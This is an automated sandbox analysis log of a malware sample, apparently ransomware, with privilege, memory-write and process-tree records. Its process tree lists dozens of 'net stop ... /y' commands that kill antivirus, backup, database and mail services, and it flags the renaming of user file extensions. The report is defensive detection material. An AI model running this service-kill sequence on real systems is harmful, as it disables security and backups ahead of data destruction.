768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exevssvc.exewmic.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription pid process Token: SeDebugPrivilege 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe Token: SeDebugPrivilege 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe Token: SeDebugPrivilege 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe Token: SeBackupPrivilege 2804 vssvc.exe Token: SeRestorePrivilege 2804 vssvc.exe Token: SeAuditPrivilege 2804 vssvc.exe Token: SeIncreaseQuotaPrivilege 252 wmic.exe Token: SeSecurityPrivilege 252 wmic.exe Token: SeTakeOwnershipPrivilege 252 wmic.exe Token: SeLoadDriverPrivilege 252 wmic.exe Token: SeSystemProfilePrivilege 252 wmic.exe Token: SeSystemtimePrivilege 252 wmic.exe Token: SeProfSingleProcessPrivilege 252 wmic.exe Token: SeIncBasePriorityPrivilege 252 wmic.exe Token: SeCreatePagefilePrivilege 252 wmic.exe Token: SeBackupPrivilege 252 wmic.exe Token: SeRestorePrivilege 252 wmic.exe Token: SeShutdownPrivilege 252 wmic.exe Token: SeDebugPrivilege 252 wmic.exe Token: SeSystemEnvironmentPrivilege 252 wmic.exe Token: SeRemoteShutdownPrivilege 252 wmic.exe Token: SeUndockPrivilege 252 wmic.exe Token: SeManageVolumePrivilege 252 wmic.exe Token: 33 252 wmic.exe Token: 34 252 wmic.exe Token: 35 252 wmic.exe Token: 36 252 wmic.exe Token: SeIncreaseQuotaPrivilege 252 wmic.exe Token: SeSecurityPrivilege 252 wmic.exe Token: SeTakeOwnershipPrivilege 252 wmic.exe Token: SeLoadDriverPrivilege 252 wmic.exe Token: SeSystemProfilePrivilege 252 wmic.exe Token: SeSystemtimePrivilege 252 wmic.exe Token: SeProfSingleProcessPrivilege 252 wmic.exe Token: SeIncBasePriorityPrivilege 252 wmic.exe Token: SeCreatePagefilePrivilege 252 wmic.exe Token: SeBackupPrivilege 252 wmic.exe Token: SeRestorePrivilege 252 wmic.exe Token: SeShutdownPrivilege 252 wmic.exe Token: SeDebugPrivilege 252 wmic.exe Token: SeSystemEnvironmentPrivilege 252 wmic.exe Token: SeRemoteShutdownPrivilege 252 wmic.exe Token: SeUndockPrivilege 252 wmic.exe Token: SeManageVolumePrivilege 252 wmic.exe Token: 33 252 wmic.exe Token: 34 252 wmic.exe Token: 35 252 wmic.exe Token: 36 252 wmic.exe Token: SeDebugPrivilege 3280 MicrosoftEdge.exe Token: SeDebugPrivilege 3280 MicrosoftEdge.exe Token: SeDebugPrivilege 3280 MicrosoftEdge.exe Token: SeDebugPrivilege 3280 MicrosoftEdge.exe Token: SeDebugPrivilege 2836 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2836 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2836 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2836 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4356 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4356 MicrosoftEdgeCP.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid process 3280 MicrosoftEdge.exe 3076 MicrosoftEdgeCP.exe 3076 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3656 wrote to memory of 4104 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4104 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4104 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 4104 wrote to memory of 3028 4104 net.exe net1.exe PID 4104 wrote to memory of 3028 4104 net.exe net1.exe PID 4104 wrote to memory of 3028 4104 net.exe net1.exe PID 3656 wrote to memory of 700 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 700 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 700 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 700 wrote to memory of 2232 700 net.exe net1.exe PID 700 wrote to memory of 2232 700 net.exe net1.exe PID 700 wrote to memory of 2232 700 net.exe net1.exe PID 3656 wrote to memory of 4076 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4076 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4076 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 4076 wrote to memory of 4060 4076 net.exe net1.exe PID 4076 wrote to memory of 4060 4076 net.exe net1.exe PID 4076 wrote to memory of 4060 4076 net.exe net1.exe PID 3656 wrote to memory of 3404 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 3404 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 3404 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3404 wrote to memory of 4332 3404 net.exe net1.exe PID 3404 wrote to memory of 4332 3404 net.exe net1.exe PID 3404 wrote to memory of 4332 3404 net.exe net1.exe PID 3656 wrote to memory of 4292 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4292 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4292 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 4292 wrote to memory of 4260 4292 net.exe net1.exe PID 4292 wrote to memory of 4260 4292 net.exe net1.exe PID 4292 wrote to memory of 4260 4292 net.exe net1.exe PID 3656 wrote to memory of 4412 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4412 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4412 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 4412 wrote to memory of 4456 4412 net.exe net1.exe PID 4412 wrote to memory of 4456 4412 net.exe net1.exe PID 4412 wrote to memory of 4456 4412 net.exe net1.exe PID 3656 wrote to memory of 4432 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4432 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 4432 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 4432 wrote to memory of 4340 4432 net.exe net1.exe PID 4432 wrote to memory of 4340 4432 net.exe net1.exe PID 4432 wrote to memory of 4340 4432 net.exe net1.exe PID 3656 wrote to memory of 3280 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 3280 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 3280 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3280 wrote to memory of 3920 3280 net.exe net1.exe PID 3280 wrote to memory of 3920 3280 net.exe net1.exe PID 3280 wrote to memory of 3920 3280 net.exe net1.exe PID 3656 wrote to memory of 1984 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 1984 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 1984 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 1984 wrote to memory of 3208 1984 net.exe net1.exe PID 1984 wrote to memory of 3208 1984 net.exe net1.exe PID 1984 wrote to memory of 3208 1984 net.exe net1.exe PID 3656 wrote to memory of 424 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 424 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 424 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 424 wrote to memory of 652 424 net.exe net1.exe PID 424 wrote to memory of 652 424 net.exe net1.exe PID 424 wrote to memory of 652 424 net.exe net1.exe PID 3656 wrote to memory of 856 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 856 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 3656 wrote to memory of 856 3656 768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe net.exe PID 856 wrote to memory of 1044 856 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\768c09ad691d4af27f50934df5879166c08c0b18abf2c1a1c8561e8589a07c91.bin.sample.exe"1⤵
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop Acronis VSS Provider /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Acronis VSS Provider /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Enterprise Client Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Enterprise Client Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Agent /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Agent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos AutoUpdate Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos AutoUpdate Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Clean Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Clean Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Device Control Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Device Control Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos File Scanner Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos File Scanner Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Health Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Health Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos MCS Agent /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos MCS Agent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos MCS Client /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos MCS Client /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Message Router /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Message Router /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos SafeStore Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos SafeStore Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Protection System Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Protection System Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Sophos Web Control Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sophos Web Control Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLsafe /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLsafe /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLsafe Filter Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLsafe Filter Service /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Symantec System Recovery /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Symantec System Recovery /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Veeam Backup Service Data Catalog /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Veeam Backup Service Data Catalog /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop Antivirus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ARSM /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop bedbg /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop DCAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop EPSecurityService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop EPUpdateService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop EraserSvc11710 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop EsgShKernel /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop FA_Scheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop IISAdmin /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop IMAP4Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop macmnsvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop masvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MBAMService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MBEndpointAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop McAfeeEngineService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop McAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop McShield /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop McTaskManager /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop mfemms /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop mfevtp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MMS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop mozyprobackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer110 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeES /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMGMT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMTA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSRS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ TPS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP $ TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP $ TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PRACTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PRACTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ TPS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL $ VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ TPS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher $ TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher $ TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MySQL80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop MySQL57 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ntrtscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleClientCache80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop POP3SVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3SVC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ TPS /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer $ TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer $ TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net.exenet stop RESVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESVC /y3⤵
-
